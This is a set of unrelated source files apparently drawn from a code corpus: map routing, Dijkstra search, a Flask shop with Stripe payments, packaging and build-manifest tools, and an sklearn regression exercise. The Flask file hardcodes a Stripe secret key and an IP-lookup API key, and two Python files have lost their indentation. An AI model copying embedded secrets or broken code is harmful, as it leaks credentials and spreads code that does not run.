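# assumptions, not the library's actual routes.
class _ExampleTaskTypeManager(BaseTaskTypeManager):
    """Minimal concrete manager wired to hypothetical endpoints."""

    list_url = "exampletasktypes/"
    detail_url = "exampletasktypes/{id}/"
    model = BaseTaskType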
|
the-stack_0_1607 | # -*- coding: utf-8 -*-
'''
This is an example that computes a driving origin-destination (OD) matrix from origins to targets, and saves the parsed results locally.
'''
import pandas as pd
import json
import os
from BaiduMapAPI.api import SearchPlace, MapDirection
AK = os.environ["BaiduAK"]
SK = os.environ["BaiduSK"]
origins_data = pd.read_csv("data/exmaple_citydata_coords.csv", encoding="utf-8")
targets_name = {
"香港":"香港国际机场", "广州": "广州白云国际机场", "深圳":"深圳宝安国际机场",
"珠海":"珠海金湾国际机场", "澳门":"澳门国际机场", "佛山":"佛山沙堤机场",
"惠州":"惠州平潭机场"
}
place = SearchPlace(AK, SK)
dirction = MapDirection(AK, SK)
fw = open("driving_result.csv", "w", encoding="utf-8")
fw.write("origin, target, distance, duration, toll \n")
for name in targets_name:
pois = place.search(targets_name[name], region=name)
poi = pois[0]
loc = poi.get_location()
for i in origins_data.index:
coords = (round(origins_data["lat"][i],5),round(origins_data["lng"][i],5))
print(coords)
content = dirction.driving(loc, coords)
content = json.loads(content)
origin = origins_data["详细地址"][i]
target = targets_name[name]
        # distance and duration of the regular route
if "result" in content:
driving_distance = content["result"]['routes'][0]["distance"]
driving_duration = content["result"]['routes'][0]["duration"]
toll = content["result"]['routes'][0]["toll"]
fw.write("%s, %s, %s, %s, %s \n"%(origin, target, driving_distance, driving_duration, toll))
fw.close() |
the-stack_0_1608 | """
Bidirectional search is a graph search algorithm that finds a shortest path from an initial vertex to a goal
vertex in a directed graph. It runs two simultaneous searches: one forward from the initial state,
and one backward from the goal, stopping when the two meet in the middle. [Wikipedia]
"""
import queue
def _visit(direction_queues, side, node, dist, length):
"""
    Function for adding the length of a path to the search queues
    Args:
        direction_queues: priority queues for the forward and backward searches
        side: which side needs to be processed (from target or from source)
        node: node itself
        dist: distances array
        length: length of the path
"""
if node not in dist[side] or dist[side][node] > length:
dist[side][node] = length
direction_queues[side].put((length, node))
def bidi_dijkstra(graph, start, target):
"""
    Calculate the shortest path via Dijkstra's algorithm, with a bidirectional optimization:
    the search runs from both the start and the target nodes and switches between them at each step
    Args:
        graph: graph representation
        start: start node
        target: target node
    Returns:
        int: length of the shortest path between the start and target nodes
    Examples:
        >>> graph = prepare_weighted_undirect_graph(
            [(1, 2, 7), (1, 3, 9), (1, 6, 14), (6, 3, 2), (6, 5, 9), (3, 2, 10), (3, 4, 11),
            (2, 4, 15), (6, 5, 9), (5, 4, 6)])
        >>> bidi_dijkstra(graph, 1, 6)
11
"""
dist = [dict(), dict()]
visits = [set(), set()]
direction_queues = [queue.PriorityQueue(), queue.PriorityQueue()]
_visit(direction_queues, 0, start, dist, 0)
_visit(direction_queues, 1, target, dist, 0)
nodes_process = [[], []]
flip_side = 0
while not direction_queues[0].empty() or not direction_queues[1].empty():
node = direction_queues[flip_side].get()[1]
for adjacent_node, edge_weigth in graph[node].items():
length = dist[flip_side][node] + edge_weigth
_visit(direction_queues, flip_side, adjacent_node, dist, length)
nodes_process[flip_side].append(node)
visits[flip_side].add(node)
if node in visits[flip_side ^ 1]:
return _calc_shortest_path(nodes_process, dist)
if not direction_queues[flip_side ^ 1].empty():
flip_side ^= 1
return -1
def _calc_shortest_path(nodes_process, dist):
"""
    Calculate the shortest path length from the nodes processed by both searches
    Args:
        nodes_process: nodes visited by the forward and backward searches
        dist: distances
    Returns:
        int: length of the shortest path
"""
shortest_path = 10 ** 16
for node in nodes_process[1] + nodes_process[0]:
if node in dist[0] and node in dist[1] and dist[0][node] + dist[1][node] < shortest_path:
shortest_path = dist[0][node] + dist[1][node]
return shortest_path
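if __name__ == "__main__":
    # --- Hedged demo (not part of the original module) ---
    # The docstring above references prepare_weighted_undirect_graph, which is not
    # defined in this file, so a small stand-in builder is used here. The graph and
    # the expected result (11) come from the docstring's own example.
    def _build_undirected_graph(edges):
        """Build a dict-of-dicts adjacency map from (u, v, weight) tuples."""
        graph = {}
        for u, v, w in edges:
            graph.setdefault(u, {})[v] = w
            graph.setdefault(v, {})[u] = w
        return graph

    demo_graph = _build_undirected_graph(
        [(1, 2, 7), (1, 3, 9), (1, 6, 14), (6, 3, 2), (6, 5, 9),
         (3, 2, 10), (3, 4, 11), (2, 4, 15), (5, 4, 6)])
    print(bidi_dijkstra(demo_graph, 1, 6))  # -> 11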
|
the-stack_0_1609 | import os
import sys
import stripe
import datetime
from flask import *
#import cloudinary as Cloud
#import cloudinary.uploader
from Backend.models import *
from Backend import db, bcrypt
from Backend.config import Config
from flask_cors import cross_origin
from Backend.ext import token_required
from Backend.registration.decorator import check_confirmed
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
auth = Blueprint('authorization', __name__)
stripe_keys = {
'secret_key': "sk_test_51IscUOBuSPNXczcenT31xOR1QnW6T2kPpfr0N3JKHvY7Idqb4oQUiOK245Azeac3VgUiN8nNT88vNf2VTkLIVebK00ZeQX3fm7",
'publishable_key': 'pk_test_51IscUOBuSPNXczceSfoIKAm7bARLi4fS9QZr5SNVOMa3aF7zlmIwmarG0fnc2ijpkn1WrVnrs9obt9zCTPihKiBe00tVxBVhKf',
}
stripe.api_key = stripe_keys['secret_key']
Message= "Problem uploading to server... if error persists, send message to [email protected] to lay complaint"
try:
PYTHON_VERSION = sys.version_info[0]
if PYTHON_VERSION == 3:
import urllib.request
resource = urllib.request.urlopen('https://api.ipregistry.co/?key=0umiu3uyv8174l')
else:
import urlparse
resource = urlparse.urlopen('https://api.ipregistry.co/?key=0umiu3uyv8174l')
payload = resource.read().decode('utf-8')
location = json.loads(payload)['location']['country']['name']
country= str(location).lower()
except Exception:
    # If the IP lookup fails, fall back to an empty string so later region checks don't raise NameError.
    country = ""
@auth.route('/config')
def get_publishable_key():
stripe_config = {'publicKey': stripe_keys['publishable_key']}
return jsonify(stripe_config)
@auth.route('/api/book/product/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def bookProduct(current_user, product_id):
product = Product.query.filter_by(id= product_id).first()
if country not in product.available_in:
return jsonify({
"message": "Product not available in your region"
})
booked = Store.query.filter_by(saved=current_user).first()
already_booked = Store.query.filter_by(saved=current_user).filter_by(stored_data=product.product_name).first()
if already_booked:
return jsonify({
"message": "Product already booked by you"
})
if not booked:
booked = Store(saved=current_user)
booked.stored_data = product.product_name
db.session.add(booked)
booked.stored_data = product.product_name
if not product:
return jsonify({
"message": "Product not found"
})
try:
product.sold = True
db.session.commit()
return jsonify({
"message": "Product has been booked"
})
except:
return jsonify({
"message": "Problem with our server... Try again"
}), 500
@auth.route('/api/my/booked')
@cross_origin()
@token_required
@check_confirmed
def myBooked(current_user):
store = Store.query.filter_by(saved=current_user).all()
data = []
for product_id in store:
products = Product.query.filter_by(product_name=product_id.stored_data).filter(Product.sold == True).all()
for product in products:
data.append({
'name': product.product_name,
'description': product.description,
"category": product.category,
"price": product.product_price,
"varieties": product.varieties,
"expires": product.expiry_date,
"rate": product.rate
})
return jsonify({
"data": data,
}), 200
@auth.route('/api/checkout/product', methods=['POST'])
@cross_origin()
def checkoutProduct():
data = request.get_json()
product = Product.query.filter_by(product_name = data['name']).first()
if not product :
return jsonify({
"message": "Product not available at the moment"
})
if country not in product.available_in:
return jsonify({
"message": "Product not available in your region"
})
elif product.sold == True:
return jsonify({
"message": "Product currently unavailable"
})
intent = stripe.PaymentIntent.create(
amount=product.product_price,
currency=product.currency
)
try:
return jsonify({
'clientSecret': intent['client_secret']
})
except Exception as e:
return jsonify(error=str(e)), 403
@auth.route('/api/add/to/cart/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def addToCart(current_user, product_id):
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "Product is not available at the moment"
})
if country not in product.available_in:
return jsonify({
"message": "Product not available in your region"
})
cart = Store.query.filter_by(saved=current_user).first()
already_booked = Store.query.filter_by(saved=current_user).filter_by(stored_data=product.product_name).first()
if already_booked:
return jsonify({
"message": "Product already in your cart"
})
try:
if not cart:
cart = Store(saved=current_user)
cart.stored_data = product.product_name
db.session.add(cart)
cart.stored_data = product.product_name
db.session.commit()
        return jsonify({
            "message": "Product successfully added to cart"
        })
except:
return jsonify({
"message": Message
})
@auth.route('/api/my/cart')
@cross_origin()
@token_required
@check_confirmed
def myStore(current_user):
store = Store.query.filter_by(saved=current_user).all()
data = []
for product_id in store:
products = Product.query.filter_by(product_name=product_id.stored_data).all()
for product in products:
data.append({'name': product.product_name,
'description': product.description,
"category": product.category,
"price": product.product_price,
"varieties": product.varieties,
"expires": product.expiry_date,
"rate": product.rate,
"currency": product.currency
})
return jsonify({
"data": data,
}), 200
@auth.route('/api/remove/from/cart/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def removeFromCart(current_user, product_id):
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "Product is not available at the moment"
})
store = Store.query.filter_by(saved=current_user).filter_by(stored_data=product.product_name).first()
if not store:
return jsonify({
"message": "product not in your cart"
})
try:
db.session.delete(store)
db.session.commit()
return jsonify({
"message": "Product successfully removed from cart"
})
except:
return jsonify({
"message": Message
})
@auth.route('/api/rate/product/<int:product_id>', methods=['POST'])
@cross_origin()
def rate(product_id):
data = request.get_json()
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "product not available"
})
try:
product.rate =product.rate + int(data['rate'])
db.session.commit()
return jsonify({
"message": "Product has been rated"
})
except:
return jsonify({
"message": Message
})
@auth.route('/api/add/comment/product/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def addComment(current_user, product_id):
data = request.get_json()
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "product not available"
})
try:
comment = Comment(thought=product)
comment.post = data['post']
db.session.add(comment)
db.session.commit()
return jsonify({
"message": "Comment on product has been posted "
})
except:
return jsonify({
"message": Message
})
@auth.route('/api/comments/product/<int:product_id>')
@cross_origin()
def comments(product_id):
product = Product.query.filter_by(id= product_id).first()
comment = Comment.query.filter_by(thought=product).all()
comment_schema = CommentSchema(many=True)
result = comment_schema.dump(comment)
return jsonify({
"data": result
}), 200
|
the-stack_0_1612 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest import Configuration
from .version import VERSION
class LUISAuthoringClientConfiguration(Configuration):
"""Configuration for LUISAuthoringClient
Note that all parameters used to create this instance are saved as instance
attributes.
:param endpoint: Supported Cognitive Services endpoints (protocol and
hostname, for example: https://westus.api.cognitive.microsoft.com).
:type endpoint: str
:param credentials: Subscription credentials which uniquely identify
client subscription.
:type credentials: None
"""
def __init__(
self, endpoint, credentials):
if endpoint is None:
raise ValueError("Parameter 'endpoint' must not be None.")
if credentials is None:
raise ValueError("Parameter 'credentials' must not be None.")
base_url = '{Endpoint}/luis/authoring/v3.0-preview'
super(LUISAuthoringClientConfiguration, self).__init__(base_url)
# Starting Autorest.Python 4.0.64, make connection pool activated by default
self.keep_alive = True
self.add_user_agent('azure-cognitiveservices-language-luis/{}'.format(VERSION))
self.endpoint = endpoint
self.credentials = credentials
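# --- Hedged usage sketch (not part of the original module; illustrative only,
# since this module is normally imported rather than run directly) ---
# The credential class below is an assumption drawn from how other Azure
# Cognitive Services SDKs pass subscription keys
# (msrest.authentication.CognitiveServicesCredentials); substitute whatever
# credential object your client actually expects.
if __name__ == "__main__":
    from msrest.authentication import CognitiveServicesCredentials

    config = LUISAuthoringClientConfiguration(
        endpoint="https://westus.api.cognitive.microsoft.com",
        credentials=CognitiveServicesCredentials("<your-subscription-key>"),
    )
    print(config.endpoint)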
|
the-stack_0_1614 | #!/usr/bin/env python
#
# Copyright 2010 Per Olofsson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path
import subprocess
import FoundationPlist
import math
from xml.etree import ElementTree
from autopkglib import Processor, ProcessorError
__all__ = ["PkgInfoCreator"]
class PkgInfoCreator(Processor):
description = "Creates an Info.plist file for a package."
input_variables = {
"template_path": {
"required": True,
"description": "An Info.plist template.",
},
"version": {
"required": True,
"description": "Version of the package.",
},
"pkgroot": {
"required": True,
"description": "Virtual root of the package.",
},
"infofile": {
"required": True,
"description": "Path to the info file to create.",
},
"pkgtype": {
"required": True,
"description": "'flat' or 'bundle'."
}
}
output_variables = {
}
__doc__ = description
def find_template(self):
'''Searches for the template, looking in the recipe directory
and parent recipe directories if needed.'''
template_path = self.env['template_path']
if os.path.exists(template_path):
return template_path
elif not template_path.startswith("/"):
recipe_dir = self.env.get('RECIPE_DIR')
search_dirs = [recipe_dir]
if self.env.get("PARENT_RECIPES"):
# also look in the directories containing the parent recipes
parent_recipe_dirs = list(set([
os.path.dirname(item)
for item in self.env["PARENT_RECIPES"]]))
search_dirs.extend(parent_recipe_dirs)
for directory in search_dirs:
test_item = os.path.join(directory, template_path)
if os.path.exists(test_item):
return test_item
raise ProcessorError("Can't find %s" % template_path)
def main(self):
if self.env['pkgtype'] not in ("bundle", "flat"):
raise ProcessorError("Unknown pkgtype %s" % self.env['pkgtype'])
template = self.load_template(self.find_template(), self.env['pkgtype'])
if self.env['pkgtype'] == "bundle":
self.create_bundle_info(template)
else:
self.create_flat_info(template)
restartaction_to_postinstallaction = {
"None": "none",
"RecommendRestart": "restart",
"RequireLogout": "logout",
"RequireRestart": "restart",
"RequireShutdown": "shutdown",
}
def convert_bundle_info_to_flat(self, info):
pkg_info = ElementTree.Element("pkg-info")
pkg_info.set("format-version", "2")
for bundle, flat in (("IFPkgFlagDefaultLocation", "install-location"),
("CFBundleShortVersionString", "version"),
("CFBundleIdentifier", "identifier")):
if bundle in info:
pkg_info.set(flat, info[bundle])
if "IFPkgFlagAuthorizationAction" in info:
if info["IFPkgFlagAuthorizationAction"] == "RootAuthorization":
pkg_info.set("auth", "root")
else:
pkg_info.set("auth", "none")
if "IFPkgFlagRestartAction" in info:
pkg_info.set("postinstall-action",
self.restartaction_to_postinstallaction[info["IFPkgFlagRestartAction"]])
payload = ElementTree.SubElement(pkg_info, "payload")
if "IFPkgFlagInstalledSize" in info:
payload.set("installKBytes", str(info["IFPkgFlagInstalledSize"]))
return ElementTree.ElementTree(pkg_info)
postinstallaction_to_restartaction = {
"none": "None",
"logout": "RequireLogout",
"restart": "RequireRestart",
"shutdown": "RequireShutdown",
}
    def convert_flat_info_to_bundle(self, flat_info):
        # Start from bundle-style defaults, then fill in values from the flat PackageInfo.
        info = {
            #"CFBundleIdentifier": "com.adobe.pkg.FlashPlayer",
            "IFPkgFlagAllowBackRev": False,
            #"IFPkgFlagAuthorizationAction": "RootAuthorization",
            #"IFPkgFlagDefaultLocation": "/",
            "IFPkgFlagFollowLinks": True,
            "IFPkgFlagInstallFat": False,
            "IFPkgFlagIsRequired": False,
            "IFPkgFlagOverwritePermissions": False,
            "IFPkgFlagRelocatable": False,
            #"IFPkgFlagRestartAction": "None",
            "IFPkgFlagRootVolumeOnly": False,
            "IFPkgFlagUpdateInstalledLanguages": False,
            "IFPkgFormatVersion": 0.1,
        }
        pkg_info = flat_info.getroot()
        if pkg_info.tag != "pkg-info":
            raise ProcessorError("PackageInfo template root isn't pkg-info")
        info["CFBundleShortVersionString"] = pkg_info.get("version", "")
        info["CFBundleIdentifier"] = pkg_info.get("identifier", "")
        info["IFPkgFlagDefaultLocation"] = pkg_info.get("install-location", "")
        if pkg_info.get("auth") == "root":
            info["IFPkgFlagAuthorizationAction"] = "RootAuthorization"
        else:
            raise ProcessorError("Don't know how to convert auth=%s to Info.plist format" % pkg_info.get("auth"))
        info["IFPkgFlagRestartAction"] = \
            self.postinstallaction_to_restartaction[pkg_info.get("postinstall-action", "none")]
        # Read the existing payload element (if any) rather than creating an empty one.
        payload = pkg_info.find("payload")
        if payload is not None:
            info["IFPkgFlagInstalledSize"] = payload.get("installKBytes", 0)
        return info
def load_template(self, template_path, template_type):
"""Load a package info template in Info.plist or PackageInfo format."""
if template_path.endswith(".plist"):
# Try to load Info.plist in bundle format.
try:
                info = FoundationPlist.readPlist(template_path)
except BaseException as e:
raise ProcessorError("Malformed Info.plist template %s" % self.env['template_path'])
if template_type == "bundle":
return info
else:
return self.convert_bundle_info_to_flat(info)
else:
# Try to load PackageInfo in flat format.
try:
info = ElementTree.parse(template_path)
except BaseException as e:
raise ProcessorError("Malformed PackageInfo template %s" % self.env['template_path'])
if template_type == "flat":
return info
else:
return self.convert_flat_info_to_bundle(info)
def get_pkgroot_size(self, pkgroot):
"""Return the size of pkgroot (in kilobytes) and the number of files."""
size = 0
nfiles = 0
for (dirpath, dirnames, filenames) in os.walk(pkgroot):
# Count the current directory and the number of files in it.
nfiles += 1 + len(filenames)
for filename in filenames:
path = os.path.join(dirpath, filename)
# Add up file size rounded up to the nearest 4 kB, which
# appears to match what du -sk returns, and what PackageMaker
# uses.
size += int(math.ceil(float(os.lstat(path).st_size) / 4096.0))
return (size, nfiles)
def create_flat_info(self, template):
info = template
pkg_info = info.getroot()
if pkg_info.tag != "pkg-info":
raise ProcessorError("PackageInfo root should be pkg-info")
pkg_info.set("version", self.env['version'])
payload = pkg_info.find("payload")
if payload is None:
payload = ElementTree.SubElement(pkg_info, "payload")
size, nfiles = self.get_pkgroot_size(self.env['pkgroot'])
payload.set("installKBytes", str(size))
payload.set("numberOfFiles", str(nfiles))
info.write(self.env['infofile'])
def create_bundle_info(self, template):
info = template
info["CFBundleShortVersionString"] = self.env['version']
ver = self.env['version'].split(".")
info["IFMajorVersion"] = ver[0]
info["IFMinorVersion"] = ver[1]
size, nfiles = self.get_pkgroot_size(self.env['pkgroot'])
info["IFPkgFlagInstalledSize"] = size
try:
FoundationPlist.writePlist(info, self.env['infofile'])
except BaseException as e:
raise ProcessorError("Couldn't write %s: %s" % (self.env['infofile'], e))
if __name__ == '__main__':
processor = PkgInfoCreator()
processor.execute_shell()
|
the-stack_0_1615 | # SPDX-License-Identifier: Apache-2.0
#
# The OpenSearch Contributors require contributions made to
# this file be licensed under the Apache-2.0 license or a
# compatible open source license.
from typing import Any
from manifests.component_manifest import ComponentManifest, Components, Component
"""
A BuildManifest is an immutable view of the outputs from a build step
The manifest contains information about the product that was built (in the `build` section),
and the components that made up the build in the `components` section.
The format for schema version 1.0 is:
schema-version: "1.0"
build:
name: string
version: string
architecture: x64 or arm64
components:
- name: string
repository: URL of git repository
ref: git ref that was built (sha, branch, or tag)
commit_id: The actual git commit ID that was built (i.e. the resolved "ref")
artifacts:
maven:
- maven/relative/path/to/artifact
- ...
plugins:
- plugins/relative/path/to/artifact
- ...
libs:
- libs/relative/path/to/artifact
- ...
- ...
"""
class BuildManifest_1_0(ComponentManifest['BuildManifest_1_0', 'BuildComponents_1_0']):
SCHEMA = {
"build": {
"required": True,
"type": "dict",
"schema": {
"architecture": {"required": True, "type": "string"},
"id": {"required": True, "type": "string"},
"name": {"required": True, "type": "string"},
"version": {"required": True, "type": "string"},
},
},
"schema-version": {"required": True, "type": "string", "allowed": ["1.0"]},
"components": {
"type": "list",
"schema": {
"type": "dict",
"schema": {
"artifacts": {
"type": "dict",
"schema": {
"maven": {"type": "list"},
"plugins": {"type": "list"},
"bundle": {"type": "list"},
"core-plugins": {"type": "list"},
"libs": {"type": "list"},
},
},
"commit_id": {"required": True, "type": "string"},
"name": {"required": True, "type": "string"},
"ref": {"required": True, "type": "string"},
"repository": {"required": True, "type": "string"},
"version": {"required": True, "type": "string"},
},
},
},
}
def __init__(self, data: Any):
super().__init__(data)
self.build = self.Build(data["build"])
def __to_dict__(self) -> dict:
return {
"schema-version": "1.0",
"build": self.build.__to_dict__(),
"components": self.components.__to_dict__()
}
class Build:
def __init__(self, data: Any):
self.name = data["name"]
self.version = data["version"]
self.architecture = data["architecture"]
self.id = data["id"]
def __to_dict__(self) -> dict:
return {
"name": self.name,
"version": self.version,
"architecture": self.architecture,
"id": self.id
}
class BuildComponents_1_0(Components['BuildComponent_1_0']):
@classmethod
def __create__(self, data: Any) -> 'BuildComponent_1_0':
return BuildComponent_1_0(data)
class BuildComponent_1_0(Component):
def __init__(self, data: Any):
super().__init__(data)
self.repository = data["repository"]
self.ref = data["ref"]
self.commit_id = data["commit_id"]
self.artifacts = data.get("artifacts", {})
self.version = data["version"]
def __to_dict__(self) -> dict:
return {
"name": self.name,
"repository": self.repository,
"ref": self.ref,
"commit_id": self.commit_id,
"artifacts": self.artifacts,
"version": self.version,
}
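# Illustrative sketch (not part of the original file): the kind of dict this
# manifest class expects. Whether the base ComponentManifest validates it
# against SCHEMA at construction time is an assumption here.
#
#   example_data = {
#       "schema-version": "1.0",
#       "build": {"name": "OpenSearch", "version": "1.0.0", "architecture": "x64", "id": "c1"},
#       "components": [{
#           "name": "OpenSearch",
#           "repository": "https://github.com/opensearch-project/OpenSearch.git",
#           "ref": "main",
#           "commit_id": "abcdef0",
#           "version": "1.0.0",
#           "artifacts": {"maven": ["maven/relative/path/to/artifact"]},
#       }],
#   }
#   manifest = BuildManifest_1_0(example_data)
#   assert manifest.build.version == "1.0.0"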
|
the-stack_0_1617 | # Practical 1
# Load in the California house pricing data and unpack the features and labels
# Import a linear regression model from sklearn
# Fit the model
# Create a fake house's features and predict its price
# Compute the score of the model on the training data
#%%
from sklearn import linear_model
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn import metrics
import numpy as np
#%%
# X, y = datasets.fetch_california_housing(return_X_y=True)
housing_data = datasets.fetch_california_housing()
X = housing_data.data
y = housing_data.target
print(X.shape)
print(y.shape)
print(housing_data.feature_names)
print(housing_data.DESCR)
#%%
model = linear_model.LinearRegression()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3) # test_size is the fraction of the data held out from the training set
X_test, X_validation, y_test, y_validation = train_test_split(X_test, y_test, test_size=0.3) # split the held-out data again into test and validation sets
print(len(y))
print(f"num samples y_train: {len(y_train)}")
print(f"num samples y_test: {len(y_test)}")
print(f"num samples y_validation: {len(y_validation)}")
print(len(X))
print(f"num samples X_train: {len(X_train)}")
print(f"num samples X_test: {len(X_test)}")
print(f"num samples X_validation: {len(X_validation)}")
# %%
np.random.seed(2)
model.fit(X_train, y_train)
y_train_pred = model.predict(X_train)
y_validation_pred = model.predict(X_validation)
y_test_pred = model.predict(X_test)
train_loss = metrics.mean_squared_error(y_train, y_train_pred)
validation_loss = metrics.mean_squared_error(y_validation, y_validation_pred)
test_loss = metrics.mean_squared_error(y_test, y_test_pred)
train_score = model.score(X_train, y_train)
validation_score = model.score(X_validation, y_validation)
test_score = model.score(X_test, y_test)
print(
    f"{model.__class__.__name__}: "
    f"Train score: {train_score}, "
    f"Validation score: {validation_score}, "
    f"Test score: {test_score}"
)
#%%
X_fake_house = np.array([[ 6.92710000e+00, 1.90000000e+01, 5.53584906e+00,
9.89245283e-01, 1.72300000e+03, 3.63407547e+00,
2.98100000e+01, -1.37660000e+02]])
y_fake_house_pred = model.predict(X_fake_house)
print(y_fake_house_pred)
# %%
# # %%
# PRACTICAL: Access the sklearn parameters
# Fit a linear regression model to the California housing dataset
# Take a look at the docs, and figure out how to print the weights and bias that this model has learnt for the dataset
# Take a look at the docs for the dataset, and
# Discuss: what does this tell you about the importance of each feature?
print(model.coef_)
print(model.intercept_)
print(housing_data.feature_names)
# %%
# PRACTICAL: Visualise the sklearn parameters
# Take a single feature of the housing dataset
# Scatter plot it against the label in an X-Y graph
# Fit a model to that feature
# Plot your predictions on top (as a line, not a scatter)
# Discuss: what do you expect the weight and bias values to be?
# Access the weight and bias from the model and print them
# Were your expectations correct?
from sklearn.datasets import fetch_california_housing
california_housing = fetch_california_housing(as_frame=True)
california_housing.frame.head()
# %%
import matplotlib.pyplot as plt
california_housing.frame['MedInc'].describe()
california_housing.frame['MedHouseVal'].describe()
subset_df = california_housing.frame[['MedInc','MedHouseVal']]
subset_df.hist(figsize=(12, 10), bins=30, edgecolor="black")
plt.subplots_adjust(hspace=0.7, wspace=0.4)
subset_df.plot(kind='scatter', x='MedInc', y='MedHouseVal', alpha=0.1)
# %%
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, r2_score
model = LinearRegression()
X = subset_df[['MedInc']]
y = subset_df['MedHouseVal']
model.fit(X,y)
y_pred = model.predict(X)
print(model.coef_)
print(model.intercept_)
print(mean_squared_error(y, y_pred))
print(r2_score(y, y_pred)) # Coefficient of determination; 1.0 is the best possible score
plt.scatter(X, y, color="black", alpha=0.1)
plt.plot(X, y_pred, color="blue", linewidth=3)
plt.xticks(())
plt.yticks(())
plt.show()
# %%
# Draw the loss function
# Fit a linear regression model to predict the house prices from one column of the California house price dataset
# Access the weight and bias from the model
# One by one, set the models' weight parameter equal to the value in a range of values
# from 10 below and 10 above the found weight and calculate the mean square error
# (hint: there's an sklearn tool for computing the MSE)
# Plot the loss agains the parameter value
# Discuss: does it look how you expect?
california_housing.frame.head()
california_housing.frame['AveRooms'].describe()
X = california_housing.frame[['AveRooms']]
y = california_housing.frame['MedHouseVal']
model.fit(X,y)
y_pred = model.predict(X)
weight = model.coef_
print(weight)
bias = model.intercept_
print(bias)
mse = mean_squared_error(y, y_pred)
print(mse)
r2 = model.score(X, y)
print(r2)
plt.scatter(X, y, color="black", alpha=0.1)
plt.plot(X, y_pred, color="blue", linewidth=3)
plt.xlabel('AveRooms')
plt.ylabel('MedianHouseVal')
plt.show()
#%%
# One by one, set the models' weight parameter equal to the value in a range of values
# from 10 below and 10 above the found weight and calculate the mean square error
# (hint: there's an sklearn tool for computing the MSE)
MSE = []
weights = []
for i in range(-10,11):
new_weight = weight + i
weights.append(new_weight)
y_new_pred = new_weight * X + bias
mse = mean_squared_error(y, y_new_pred)
MSE.append(mse)
print(MSE)
print(weights)
plt.scatter(weights, MSE , color="black")
plt.xlabel('weights')
plt.ylabel('MSE')
plt.show()
# %%
weight_adjustment = range(-10,10)
# %%
# Practical - classification dataset
# Load in the breast cancer dataset from sklearn
# Find a classification model in sklearn
# Initialise the model
# Fit the model
# Get the score on the training data
# Print a prediction made by the fitted model
from sklearn import datasets
data = datasets.load_breast_cancer()
print(data.keys())
print(data.DESCR)
import pandas as pd
df = pd.DataFrame(data.data, columns=data.feature_names)
df['target'] = data.target
df.head()
df.info()
# %%
# Store the feature data
X = data.data
# store the target data
y = data.target
# split the data using Scikit-Learn's train_test_split
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y)
# %%
from sklearn.neighbors import KNeighborsClassifier
knn = KNeighborsClassifier(n_neighbors=6)
knn.fit(X_train, y_train)
knn.score(X_test, y_test)
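# The practical also asks for a prediction from the fitted model; a minimal
# example using the first row of the held-out test set (any row would do):
print(f"predicted class: {knn.predict(X_test[:1])[0]}, actual class: {y_test[0]}")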
# %%
|
the-stack_0_1619 | from audiomate import annotations
from audiomate.utils import textfile
WILDCARD_COMBINATION = ('**',)
class UnmappedLabelsException(Exception):
def __init__(self, message):
super(UnmappedLabelsException, self).__init__(message)
self.message = message
def relabel(label_list, projections):
"""
Relabel an entire :py:class:`~audiomate.annotations.LabelList` using user-defined projections.
Labels can be renamed, removed or overlapping labels can be flattened to a single label per segment.
Each entry in the dictionary of projections represents a single projection that maps a combination of labels (key)
to a single new label (value). The combination of labels to be mapped is a tuple of naturally sorted labels that
    apply to one or more segments simultaneously. By defining a special wildcard projection using `('**',)` it is not
required to specify a projection for every single combination of labels.
This method raises a :py:class:`~audiomate.corpus.utils.labellist.UnmappedLabelsException` if a projection for one
or more combinations of labels is not defined.
Args:
label_list (audiomate.annotations.LabelList): The label list to relabel
projections (dict): A dictionary that maps tuples of label combinations to string
labels.
Returns:
audiomate.annotations.LabelList: New label list with remapped labels
Raises:
UnmappedLabelsException: If a projection for one or more combinations of labels is not defined.
Example:
>>> projections = {
... ('a',): 'a',
... ('b',): 'b',
... ('c',): 'c',
... ('a', 'b',): 'a_b',
... ('a', 'b', 'c',): 'a_b_c',
... ('**',): 'b_c',
... }
>>> label_list = annotations.LabelList(labels=[
... annotations.Label('a', 3.2, 4.5),
... annotations.Label('b', 4.0, 4.9),
... annotations.Label('c', 4.2, 5.1)
... ])
>>> ll = relabel(label_list, projections)
>>> [l.value for l in ll]
['a', 'a_b', 'a_b_c', 'b_c', 'c']
"""
unmapped_combinations = find_missing_projections(label_list, projections)
if len(unmapped_combinations) > 0:
raise UnmappedLabelsException('Unmapped combinations: {}'.format(unmapped_combinations))
new_labels = []
for labeled_segment in label_list.ranges():
combination = tuple(sorted([label.value for label in labeled_segment[2]]))
label_mapping = projections[combination] if combination in projections else projections[WILDCARD_COMBINATION]
if label_mapping == '':
continue
new_labels.append(annotations.Label(label_mapping, labeled_segment[0], labeled_segment[1]))
return annotations.LabelList(idx=label_list.idx, labels=new_labels)
def find_missing_projections(label_list, projections):
"""
Finds all combinations of labels in `label_list` that are not covered by an entry in the dictionary of
    `projections`. Returns a list containing tuples of uncovered label combinations or an empty list if there are none.
All uncovered label combinations are naturally sorted.
Each entry in the dictionary of projections represents a single projection that maps a combination of labels (key)
to a single new label (value). The combination of labels to be mapped is a tuple of naturally sorted labels that
